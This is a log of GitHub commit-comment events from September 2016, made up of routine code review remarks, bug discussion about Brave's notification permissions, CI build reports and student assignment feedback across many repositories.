{"id":"4552154742","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992386,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T21:57:11Z","updated_at":"2016-09-12T21:57:11Z","body":"this appears to be the cause of https://github.com/brave/browser-laptop/issues/3877\r\n`origin` is the url passed to the permission manager and `embedderOrigin`, which is not a very good name, is actually the url of the webcontents if it is available. In the case of web notifications it is not available and will always be null causing the method to return. As a side note, if this method returns without invoking the callback it will leak memory"}},"created_at":"2016-09-12T21:57:11Z"}
{"id":"4552159669","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18992399,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T21:58:05Z","updated_at":"2016-09-12T21:58:05Z","body":"Yes, you do gotcha, indeed! :laughing: "}},"created_at":"2016-09-12T21:58:05Z"}
{"id":"4552172158","type":"CommitCommentEvent","actor":{"login":"linas"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18992433,"position":53,"line":535,"path":"link-grammar/dict-file/dictionary.c","commit_id":"e05f475f8cb94f9fda940ac5d4b8dcd23d509b4e","created_at":"2016-09-12T22:00:31Z","updated_at":"2016-09-12T22:00:31Z","body":"Ah! OK, thanks.  I just now moved the string set a bit earlier in the code"}},"created_at":"2016-09-12T22:00:31Z"}
{"id":"4552176066","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992439,"position":null,"line":null,"path":null,"commit_id":"a60c2c084e6e561a6af0cc5cbc41cf2e75e48efc","created_at":"2016-09-12T22:01:14Z","updated_at":"2016-09-12T22:01:14Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-12T22:01:14Z"}
{"id":"4552179253","type":"CommitCommentEvent","actor":{"login":"seanfarley"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":18992445,"position":null,"line":null,"path":null,"commit_id":"aeaa4e685de99f4acfc5cc4288502476c74a697c","created_at":"2016-09-12T22:01:50Z","updated_at":"2016-09-12T22:01:50Z","body":"Ok, I submitted #176 in the hopes of fixing this."}},"created_at":"2016-09-12T22:01:50Z"}
{"id":"4552180802","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992450,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:02:10Z","updated_at":"2016-09-12T22:02:10Z","body":"@bridiver shouldn't it be non-null for geolocation? i checked using https://developer.mozilla.org/en-US/docs/Web/API/Geolocation/Using_geolocation "}},"created_at":"2016-09-12T22:02:10Z"}
{"id":"4552182187","type":"CommitCommentEvent","actor":{"login":"leomkyll"},"repo":{"name":"leomkyll/GameMakersContent"},"payload":{"comment":{"id":18992452,"position":null,"line":null,"path":null,"commit_id":"5b7c9162513e8cc4355f812c241778f22fb708b5","created_at":"2016-09-12T22:02:26Z","updated_at":"2016-09-12T22:02:26Z","body":"Create README"}},"created_at":"2016-09-12T22:02:26Z"}
{"id":"4552182534","type":"CommitCommentEvent","actor":{"login":"RolandMunsil"},"repo":{"name":"amizener64/124-hw0"},"payload":{"comment":{"id":18992454,"position":26,"line":25,"path":"src/edu/macalester/comp124/hw0/Area.java","commit_id":"0778d3704c7cdc524d3c280ab74103971ba00a3a","created_at":"2016-09-12T22:02:29Z","updated_at":"2016-09-12T22:02:29Z","body":"Protip: this is the equation for circumference, not area. You still got full points though :ok_hand: :ok_hand: "}},"created_at":"2016-09-12T22:02:29Z"}
{"id":"4552183369","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992455,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:02:40Z","updated_at":"2016-09-12T22:02:40Z","body":"yes, in some cases it will be non-null, but for web notifications it will always be null and that's why it fails here"}},"created_at":"2016-09-12T22:02:40Z"}
{"id":"4552183820","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992456,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:02:45Z","updated_at":"2016-09-12T22:02:45Z","body":"working on a fix now"}},"created_at":"2016-09-12T22:02:45Z"}
{"id":"4552184106","type":"CommitCommentEvent","actor":{"login":"sagersmith8"},"repo":{"name":"sagersmith8/ai_graph_coloring"},"payload":{"comment":{"id":18992457,"position":15,"line":77,"path":"tests/test_problem_generator.py","commit_id":"10ca4a328da7a09cda80698ea30dbe1196a75611","created_at":"2016-09-12T22:02:49Z","updated_at":"2016-09-12T22:02:49Z","body":"Keep in mind that the comment if printed when a test fails"}},"created_at":"2016-09-12T22:02:49Z"}
{"id":"4552184276","type":"CommitCommentEvent","actor":{"login":"lucasgallucci"},"repo":{"name":"amarazzi/coderhouse-camada-1142"},"payload":{"comment":{"id":18992458,"position":null,"line":null,"path":null,"commit_id":"42731a2ccba57033cc5474ebe52342f0bb5a2a51","created_at":"2016-09-12T22:02:51Z","updated_at":"2016-09-12T22:02:51Z","body":"Muy buen trabajo, recordá que podés utilizar flex para posicionar, te va a facilitar bastantes secciones."}},"created_at":"2016-09-12T22:02:51Z"}
{"id":"4552186629","type":"CommitCommentEvent","actor":{"login":"mindnever"},"repo":{"name":"AlessioMorale/qgroundcontrol"},"payload":{"comment":{"id":18992463,"position":53,"line":89,"path":"android/src/com/hoho/android/usbserial/driver/CdcAcmSerialDriver.java","commit_id":"22db129cb3c6f51ef3ca47211afc177a1efb5aa7","created_at":"2016-09-12T22:03:20Z","updated_at":"2016-09-12T22:03:20Z","body":"Is this correct? Shouldn't it be if(mDataInterface == null) ?\r\n"}},"created_at":"2016-09-12T22:03:20Z"}
{"id":"4552186922","type":"CommitCommentEvent","actor":{"login":"MightyCreak"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":18992464,"position":5,"line":441,"path":"lib/Cake/View/Helper/PaginatorHelper.php","commit_id":"bfb12291dc0b669d6bf300abd81a64bdb6780918","created_at":"2016-09-12T22:03:24Z","updated_at":"2016-09-12T22:03:24Z","body":"I think you can set the comment on separated lines at that point ;)"}},"created_at":"2016-09-12T22:03:24Z"}
{"id":"4552187125","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18992465,"position":6,"line":15,"path":"glossary.md","commit_id":"669d3f9158ef87d20bf4bf2e18028c7b896d9cd9","created_at":"2016-09-12T22:03:27Z","updated_at":"2016-09-12T22:03:27Z","body":"Why remove this? it can be used in repudiation of Responder."}},"created_at":"2016-09-12T22:03:27Z"}
{"id":"4552192449","type":"CommitCommentEvent","actor":{"login":"AndrewPhysics"},"repo":{"name":"AndrewPhysics/dead-time-logic-of-nuclear-detectors"},"payload":{"comment":{"id":18992473,"position":null,"line":null,"path":null,"commit_id":"7fcf024806bb0d5f5748c277ed4509f1194a935d","created_at":"2016-09-12T22:04:27Z","updated_at":"2016-09-12T22:04:27Z","body":"For detection systems that record discrete events, such as particle and nuclear detectors, the dead time is the time after each event during which the system is not able to record another event. An everyday life example of this is what happens when someone takes a photo using a flash, another picture cannot be taken immediately afterward because the flash needs a few seconds to recharge.\r\nThis code is focused on dead time and the subsequent count loss estimation in radiation detection systems. The dead time is the minimum amount of time required between two events to permit detection of those events individually by a radiation detection system. If events occur during the system dead time, they are lost. Such lost information can be important in many applications including high-precision\r\nspectroscopy, positron emission tomography (PET), and the scanning of spent nuclear fuel. Understanding of the behavior of radiation detection systems is important; thus this work included a comprehensive review of dead time and pulse pile-up models and methods."}},"created_at":"2016-09-12T22:04:27Z"}
{"id":"4552193260","type":"CommitCommentEvent","actor":{"login":"Kuroshii"},"repo":{"name":"sagersmith8/ai_graph_coloring"},"payload":{"comment":{"id":18992476,"position":15,"line":77,"path":"tests/test_problem_generator.py","commit_id":"10ca4a328da7a09cda80698ea30dbe1196a75611","created_at":"2016-09-12T22:04:37Z","updated_at":"2016-09-12T22:04:37Z","body":"Is that a bad thing?"}},"created_at":"2016-09-12T22:04:37Z"}
{"id":"4552195483","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992479,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:05:06Z","updated_at":"2016-09-12T22:05:06Z","body":"this may be causing notification issues but i think there is another problem in #3877 "}},"created_at":"2016-09-12T22:05:06Z"}
{"id":"4552199174","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18992481,"position":17,"line":942,"path":"infusions/forum/classes/admin/view.php","commit_id":"f6cea597eeed547f7cb4ead90b425e3f282297be","created_at":"2016-09-12T22:05:48Z","updated_at":"2016-09-12T22:05:48Z","body":"Need to specify form_name which it is to trigger insert. Default value - 'inputform', the admin form's ID is 'input_form'. Javascript fail to find which textbox it is suppose to insert without the correct one."}},"created_at":"2016-09-12T22:05:48Z"}
{"id":"4552201449","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18992485,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-12T22:06:17Z","updated_at":"2016-09-12T22:06:17Z","body":"Can't get `minOptionalTestsToPass` config to work out the box, you have to validate using a property on the OWASP result object called 'strong' instead of 'error'... which then means the password requirement progress bar won't be accurate."}},"created_at":"2016-09-12T22:06:17Z"}
{"id":"4552201694","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Rehearsal"},"payload":{"comment":{"id":18992486,"position":null,"line":null,"path":null,"commit_id":"3c199fe86a654a15350b38f1caaddbff92c977be","created_at":"2016-09-12T22:06:19Z","updated_at":"2016-09-12T22:06:19Z","body":"Dumb luck / divination \n\nSent from my phone\n\n> On Sep 12, 2016, at 17:55, Rachit Nigam <notifications@github.com> wrote:\n> \n> @arjunguha Where did you find about this thing? (Just for future reference as things to look into).\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-12T22:06:19Z"}
{"id":"4552203964","type":"CommitCommentEvent","actor":{"login":"koppor"},"repo":{"name":"bartsch-dev/jabref"},"payload":{"comment":{"id":18992491,"position":14,"line":124,"path":"build.gradle","commit_id":"46cf03a7f231958193e6d46f9a97c17da554c2a4","created_at":"2016-09-12T22:06:46Z","updated_at":"2016-09-12T22:06:46Z","body":"Can you add a short comment?"}},"created_at":"2016-09-12T22:06:46Z"}
{"id":"4552205314","type":"CommitCommentEvent","actor":{"login":"ggzengel"},"repo":{"name":"zfsonlinux/zfs"},"payload":{"comment":{"id":18992496,"position":null,"line":null,"path":null,"commit_id":"1f734a62ac8f8b9bb3b6e3ad5397fc94f205c0f6","created_at":"2016-09-12T22:07:02Z","updated_at":"2016-09-12T22:07:02Z","body":"On, off, on - there was a step to much for me. :-)\r\nSorry for the noise."}},"created_at":"2016-09-12T22:07:02Z"}
{"id":"4552205989","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992498,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:07:11Z","updated_at":"2016-09-12T22:07:11Z","body":"it is definitely the problem in #3877. The check fails if either one is null and embedder origin is always null for web notifications. If I remove that check or change it to and `&&` it works fine. The twitter issue that this was intended to solve is a problem in electron"}},"created_at":"2016-09-12T22:07:11Z"}
{"id":"4552209529","type":"CommitCommentEvent","actor":{"login":"Peter-Slump"},"repo":{"name":"Peter-Slump/energy-dashboard"},"payload":{"comment":{"id":18992504,"position":null,"line":null,"path":null,"commit_id":"8dc5be8bfa3be88f0a59faadf65655146b178216","created_at":"2016-09-12T22:07:52Z","updated_at":"2016-09-12T22:07:52Z","body":"closes #6 "}},"created_at":"2016-09-12T22:07:52Z"}
{"id":"4552211334","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992508,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:08:14Z","updated_at":"2016-09-12T22:08:14Z","body":"what about for geolocation? https://github.com/brave/browser-laptop/issues/3877#issuecomment-246454160"}},"created_at":"2016-09-12T22:08:14Z"}
{"id":"4552214292","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-scripts"},"payload":{"comment":{"id":18992520,"position":11,"line":44,"path":"c99330325.lua","commit_id":"8ea2023cdf0cbbfb6ccd4fbd7ba8c88644a5e410","created_at":"2016-09-12T22:08:49Z","updated_at":"2016-09-12T22:08:49Z","body":"this should be FieldGroupCount, not MatchingGroupCount, shouldn't it?"}},"created_at":"2016-09-12T22:08:49Z"}
{"id":"4552216216","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992524,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:09:13Z","updated_at":"2016-09-12T22:09:13Z","body":"might also be null for geo, but I know for sure it's null for web notifications. I'll check all 3 issues when it's ready"}},"created_at":"2016-09-12T22:09:13Z"}
{"id":"4552218696","type":"CommitCommentEvent","actor":{"login":"Peter-Slump"},"repo":{"name":"Peter-Slump/energy-dashboard"},"payload":{"comment":{"id":18992531,"position":null,"line":null,"path":null,"commit_id":"94603a2f056026cc081979990b0a523a97b84a74","created_at":"2016-09-12T22:09:44Z","updated_at":"2016-09-12T22:09:44Z","body":"closes #12 "}},"created_at":"2016-09-12T22:09:44Z"}
{"id":"4552219922","type":"CommitCommentEvent","actor":{"login":"GTAXL"},"repo":{"name":"unrealircd/unrealircd"},"payload":{"comment":{"id":18992536,"position":null,"line":null,"path":null,"commit_id":"6a9b32344ebaaed875e15149575ae79efd779b07","created_at":"2016-09-12T22:09:59Z","updated_at":"2016-09-12T22:09:59Z","body":"I agree, I think it's silly you have to update all these different files just to bump the version number."}},"created_at":"2016-09-12T22:09:59Z"}
{"id":"4552225641","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18992562,"position":null,"line":null,"path":null,"commit_id":"470c342dd2dbf9748ef3b5fd11d12b1b1f8bf0e6","created_at":"2016-09-12T22:11:14Z","updated_at":"2016-09-12T22:11:14Z","body":"Yes, for all version all build. I want to automatic update all table with my final product."}},"created_at":"2016-09-12T22:11:14Z"}
{"id":"4552226047","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992565,"position":null,"line":null,"path":null,"commit_id":"4d2c265cc404628ae834017cce6e9bd7d75859c2","created_at":"2016-09-12T22:11:19Z","updated_at":"2016-09-12T22:11:19Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-12T22:11:19Z"}
{"id":"4552226605","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992568,"position":null,"line":null,"path":null,"commit_id":"9bdc19b2c117e5174a79e9c6c79c964a9b81f9c3","created_at":"2016-09-12T22:11:26Z","updated_at":"2016-09-12T22:11:26Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n- [docs/migrate-wordpress](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-12T22:11:26Z"}
{"id":"4552228281","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":18992570,"position":null,"line":null,"path":null,"commit_id":"ce75d0a72c9c9896290cf5a6d2c57fb01232f89b","created_at":"2016-09-12T22:11:49Z","updated_at":"2016-09-12T22:11:49Z","body":"nice idea but I'm not sure if I like it,.. i mean in terms of security concerns, and actually `{{ @foo | trim }}` is not that much different from `{{ trim(@foo) }}`, instead you can't have your own custom `trim` filter anymore now."}},"created_at":"2016-09-12T22:11:49Z"}
{"id":"4552228304","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18992571,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T22:11:49Z","updated_at":"2016-09-12T22:11:49Z","body":"I had just logged in before I tested with satchels, I definitely wasn't in god mode.  My rpt has a lot of messages: \"dayz_lastDamageSourceNull triggered\" from the script, considering I'm on a local test server they aren't malicious."}},"created_at":"2016-09-12T22:11:49Z"}
{"id":"4552228341","type":"CommitCommentEvent","actor":{"login":"AlessioMorale"},"repo":{"name":"AlessioMorale/qgroundcontrol"},"payload":{"comment":{"id":18992572,"position":53,"line":89,"path":"android/src/com/hoho/android/usbserial/driver/CdcAcmSerialDriver.java","commit_id":"22db129cb3c6f51ef3ca47211afc177a1efb5aa7","created_at":"2016-09-12T22:11:50Z","updated_at":"2016-09-12T22:11:50Z","body":"good catch :)"}},"created_at":"2016-09-12T22:11:50Z"}
{"id":"4552231898","type":"CommitCommentEvent","actor":{"login":"ace2nutzer"},"repo":{"name":"ChronoMonochrome/Chrono_Kernel-1"},"payload":{"comment":{"id":18992587,"position":5,"line":715,"path":"arch/arm/configs/codina_defconfig","commit_id":"f561c5d71dd58e5bc273b0b5fd04a3d92a81b4f2","created_at":"2016-09-12T22:12:36Z","updated_at":"2016-09-12T22:12:36Z","body":"if i enabled it in defconfig is it enough ?\r\nor i need to do other changes like this huge commit here ?"}},"created_at":"2016-09-12T22:12:36Z"}
{"id":"4552236222","type":"CommitCommentEvent","actor":{"login":"chirag04"},"repo":{"name":"exponentjs/ex-navigation"},"payload":{"comment":{"id":18992603,"position":9,"line":85,"path":"src/ExNavigationStyles.js","commit_id":"a9e3e5a1f4041061e72a91deef6a1604e342775c","created_at":"2016-09-12T22:13:29Z","updated_at":"2016-09-12T22:13:29Z","body":"😆 \r\n\r\nwe need to set a baseline for min. supported RN version."}},"created_at":"2016-09-12T22:13:29Z"}
{"id":"4552238009","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18992607,"position":null,"line":null,"path":null,"commit_id":"b29e85bf5ad558827d742631f5891c53b7f1b8e6","created_at":"2016-09-12T22:13:53Z","updated_at":"2016-09-12T22:13:53Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-yokozuna/builds/1919\n"}},"created_at":"2016-09-12T22:13:53Z"}
{"id":"4552239609","type":"CommitCommentEvent","actor":{"login":"martin-leclerc"},"repo":{"name":"little-dude/vsd-api-specifications"},"payload":{"comment":{"id":18992612,"position":null,"line":null,"path":null,"commit_id":"c5a52cbfb6af523e230b0da002a244145cb48f99","created_at":"2016-09-12T22:14:15Z","updated_at":"2016-09-12T22:14:15Z","body":"But then aren't we back to square one? Restoring entity name back to\n\"Alarm\" will cause the presence of two attributes called \"alarms\" in the\ngenerated VSPK code, which causes a compile error in Java.\n\nMartin\n\nOn Sep 12, 2016 6:08 PM, \"Corentin Henry\" <notifications@github.com> wrote:\n\nRestore \"Alarm\" entity name in allalarm.spec\n\nSince it is unclear wether the change made in\na1c18b9dbdda0ede6319829af16e201b9d98ac27 is valid or not, this commit\nrestores the original specification.\n\ncc @natabal @martin-leclerc @t00f @pdellaert\n\n--\nYou are receiving this because you were mentioned.\nReply to this email directly or view it on GitHub:\nhttps://github.com/little-dude/vsd-api-specifications/commit/\nc5a52cbfb6af523e230b0da002a244145cb48f99\n"}},"created_at":"2016-09-12T22:14:15Z"}
{"id":"4552240074","type":"CommitCommentEvent","actor":{"login":"s1kx"},"repo":{"name":"corngood/archlinux-amdgpu"},"payload":{"comment":{"id":18992613,"position":null,"line":null,"path":null,"commit_id":"5d43d11a82a4eac861371a40c13ce5c8dee83903","created_at":"2016-09-12T22:14:20Z","updated_at":"2016-09-12T22:14:20Z","body":"I was able to compile the DKMS module with DAL enabled on a RX 480. Can't confirm yet whether FreeSync is working yet or not though."}},"created_at":"2016-09-12T22:14:20Z"}
{"id":"4552244672","type":"CommitCommentEvent","actor":{"login":"oldperson"},"repo":{"name":"EEIT87Team03/Aoide"},"payload":{"comment":{"id":18992648,"position":null,"line":null,"path":null,"commit_id":"55b7ad75e49d827b02e83f44e4d2776dda7caa2c","created_at":"2016-09-12T22:15:17Z","updated_at":"2016-09-12T22:15:17Z","body":"ok 瞭解\r\n"}},"created_at":"2016-09-12T22:15:17Z"}
{"id":"4552244751","type":"CommitCommentEvent","actor":{"login":"rpp25"},"repo":{"name":"rpp25/assignment1"},"payload":{"comment":{"id":18992649,"position":22,"line":22,"path":"rajpatel-assignment1","commit_id":"cf2cc757ff87d967a8c8934641ffa9821fb4ee97","created_at":"2016-09-12T22:15:18Z","updated_at":"2016-09-12T22:15:18Z","body":"Should have ended the unordered list tag with </ul>\r\n"}},"created_at":"2016-09-12T22:15:18Z"}
{"id":"4552251531","type":"CommitCommentEvent","actor":{"login":"lucasgallucci"},"repo":{"name":"tomasvecchi/1erTP"},"payload":{"comment":{"id":18992665,"position":null,"line":null,"path":null,"commit_id":"7bebd8553e16d6f9865a74882a8a21597fc5ab21","created_at":"2016-09-12T22:16:42Z","updated_at":"2016-09-12T22:16:42Z","body":"Buen trabajo Tomás! ponele pilas a las mediaqueries! "}},"created_at":"2016-09-12T22:16:42Z"}
{"id":"4552261319","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18992689,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-12T22:18:47Z","updated_at":"2016-09-12T22:18:47Z","body":"i didn't actually test this commit using the Twitter example, but it did fix the problem of notification bars not appearing on https://developer.mozilla.org/en-US/docs/Web/API/notification (which asks for notification permission from a third-party context)."}},"created_at":"2016-09-12T22:18:47Z"}
{"id":"4552261688","type":"CommitCommentEvent","actor":{"login":"LiquitoX"},"repo":{"name":"LiquitoX/PingTestApp"},"payload":{"comment":{"id":18992690,"position":1,"line":1,"path":"PingApp/PingApp/ChangeLog/ChangeLog.txt","commit_id":"bd8f6fac8632ec636dda695973bc3068bfa94e79","created_at":"2016-09-12T22:18:52Z","updated_at":"2016-09-12T22:18:52Z","body":"The many commits weren't my intention, some things went wrong with the branch 0.2.0.0"}},"created_at":"2016-09-12T22:18:52Z"}
{"id":"4552268667","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18992700,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-12T22:20:27Z","updated_at":"2016-09-12T22:20:27Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-MacOS-10.9-clang: OK (2326 of 2329 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T22:20:27Z"}
{"id":"4552272679","type":"CommitCommentEvent","actor":{"login":"erikssonk"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18992709,"position":5,"line":29,"path":"pogom/proxy.py","commit_id":"04723899c15fd0b71d6bf9a6b90fe335fa23cf82","created_at":"2016-09-12T22:21:23Z","updated_at":"2016-09-12T22:21:23Z","body":"Thanks, sorry I forgot about changing that back :)"}},"created_at":"2016-09-12T22:21:23Z"}
{"id":"4552279269","type":"CommitCommentEvent","actor":{"login":"mikerogne"},"repo":{"name":"DominusExult/sulaco-dominus"},"payload":{"comment":{"id":18992725,"position":null,"line":null,"path":null,"commit_id":"e297afd00e799144af01d4de102d15b5b92f8ac5","created_at":"2016-09-12T22:22:57Z","updated_at":"2016-09-12T22:22:57Z","body":"Nice! No issues with any of it?"}},"created_at":"2016-09-12T22:22:57Z"}
{"id":"4552280599","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992730,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:23:14Z","updated_at":"2016-09-12T22:23:14Z","body":"No."}},"created_at":"2016-09-12T22:23:14Z"}
{"id":"4552281468","type":"CommitCommentEvent","actor":{"login":"diogomoreira"},"repo":{"name":"ads-ifpb-praticas-20161/javalijsf"},"payload":{"comment":{"id":18992732,"position":null,"line":null,"path":null,"commit_id":"1bacb29d5e1f427cfa95ed2c1b85e08ab617e160","created_at":"2016-09-12T22:23:26Z","updated_at":"2016-09-12T22:23:26Z","body":"\"javalijsf\" :joy:"}},"created_at":"2016-09-12T22:23:26Z"}
{"id":"4552284237","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992734,"position":4,"line":54,"path":"test/functional/response.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:24:08Z","updated_at":"2016-09-12T22:24:08Z","body":"Those tests are for liquid-json."}},"created_at":"2016-09-12T22:24:08Z"}
{"id":"4552286166","type":"CommitCommentEvent","actor":{"login":"schlosna"},"repo":{"name":"palantir/atlasdb"},"payload":{"comment":{"id":18992738,"position":14,"line":34,"path":"atlasdb-client/src/main/java/com/palantir/atlasdb/transaction/impl/AbstractTransactionManager.java","commit_id":"cfa4881bd6e7e7ce9df441d7c1960510dae0db14","created_at":"2016-09-12T22:24:34Z","updated_at":"2016-09-12T22:24:34Z","body":"Why is this static?"}},"created_at":"2016-09-12T22:24:34Z"}
{"id":"4552286610","type":"CommitCommentEvent","actor":{"login":"JosephSousa"},"repo":{"name":"ads-ifpb-praticas-20161/javalijsf"},"payload":{"comment":{"id":18992742,"position":null,"line":null,"path":null,"commit_id":"1bacb29d5e1f427cfa95ed2c1b85e08ab617e160","created_at":"2016-09-12T22:24:41Z","updated_at":"2016-09-12T22:24:41Z","body":"kkkkkkkkkkkk\n\n\n2016-09-12 19:23 GMT-03:00 Diogo Moreira <notifications@github.com>:\n\n> \"javalijsf\" 😂\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ads-ifpb-praticas-20161/javalijsf/commit/1bacb29d5e1f427cfa95ed2c1b85e08ab617e160#commitcomment-18992732>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQLC_KvDPTZojfLJtrS0ShTw1jQ7xFaaks5qpdDfgaJpZM4J7GM8>\n> .\n>\n\n\n\n-- \n\nJoseph Santos\n\nEstudante de ADS,IFPB Cajazeiras\n\nTel:(83)998692512\n"}},"created_at":"2016-09-12T22:24:41Z"}
{"id":"4552287712","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18992744,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-12T22:24:56Z","updated_at":"2016-09-12T22:24:56Z","body":"In other words, this PR is incomplete. `password-validator.client.directive.js` needs to be modified too."}},"created_at":"2016-09-12T22:24:56Z"}
{"id":"4552291237","type":"CommitCommentEvent","actor":{"login":"Ilshidur"},"repo":{"name":"Ilshidur/lol-item-sets-generator.org"},"payload":{"comment":{"id":18992750,"position":5,"line":50,"path":"app/server/methods.js","commit_id":"719dbb7b1275f15604f5af8657a425f332cdcbb2","created_at":"2016-09-12T22:25:46Z","updated_at":"2016-09-12T22:25:46Z","body":"Somehow, this method makes the server CPU go crazy."}},"created_at":"2016-09-12T22:25:46Z"}
